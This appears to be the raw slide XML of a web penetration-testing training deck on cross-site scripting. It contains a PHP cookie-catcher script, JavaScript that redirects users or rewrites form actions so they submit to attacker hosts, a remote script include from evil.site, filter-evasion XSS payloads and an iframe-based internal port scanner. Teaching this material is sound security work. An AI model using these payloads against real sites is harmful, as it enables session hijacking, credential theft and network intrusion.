            <a:ext cx="8153400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We can also include a cookie catcher script on our server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This code logs the cookies in a simpler format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We don't have to parse the web server logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>$cookies = $_SERVER['REQUEST_URI'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>$output = "Received=".$cookies."\n";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>$fh = fopen("/tmp/cookiedump", "a+");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>$contents = fwrite($fh, $output);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>fclose($fh);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Redirecting a User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="262330" y="1756350"/>
            <a:ext cx="8610600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We can also inject code to redirect a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;script language="javascript"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>window.location.href = "http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>professionallyevil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>" ; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We can also change the form action to have it submit to us</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>document.forms[1].action="http://www.PEWAPT.org/"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>External Scripts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90115" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1768840"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Example show injecting scripts directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Small scripts work but are limited by the size of the input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Loading remote scripts allows us to include premade attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It is simple to load a remote file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&lt;script src="http://evil.site/bad.js"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</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04085" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Evasion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1623654"/>
            <a:ext cx="8686800" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It is more common now for sites to filter input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Typically this is done by blacklisting strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Trivial to bypass in most cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Here are some examples of evasion techniques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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Expand the Foothold</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We use this step to expand our foothold</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Pivot through the application to find other flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Launch further attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Enables us to better understand the risk to the organization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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Evasion Example (1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1593674"/>
            <a:ext cx="8686800" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The following are version of the traditional attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Image Tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&lt;IMG SRC="javascript:alert('XSS');"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Malformed IMG Tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&lt;IMG """&gt;&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Evasion Example (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93187" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520910" y="1337525"/>
            <a:ext cx="8077200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The following are version of the traditional attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTML Entities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Hex Encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="2200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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62725"/>
            <a:ext cx="8458200" cy="44196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94214"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101379"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15904"/>
            <a:ext cx="8458200" cy="44196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01382"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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Advanced Script Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102403" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579620" y="1711380"/>
            <a:ext cx="8001000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We have looked at some basic examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Now we are going to explore more advanced examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will also explore an exploitation tool named Durzosploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>With these attacks the sky is the limit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>… We are limited only by our imagination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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Port Scanner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103427" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352270" y="1681400"/>
            <a:ext cx="4953000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses hidden IFRAMEs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Source of IFRAME is an internal IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If onload() fires; Port is open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Code then changes source of the iframe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="191491" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="1850040"/>
            <a:ext cx="3309938" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Internal Addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104451" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Internal addresses are needed to perform these scans</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This would allow further network exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Java Applet is required as JavaScript can't access IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>MyAddress.class is one example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Lars Kinderman</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://reglos.de/myaddress/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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Using MyAddress.class</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105475" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Create a MyAddress() JavaScript function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
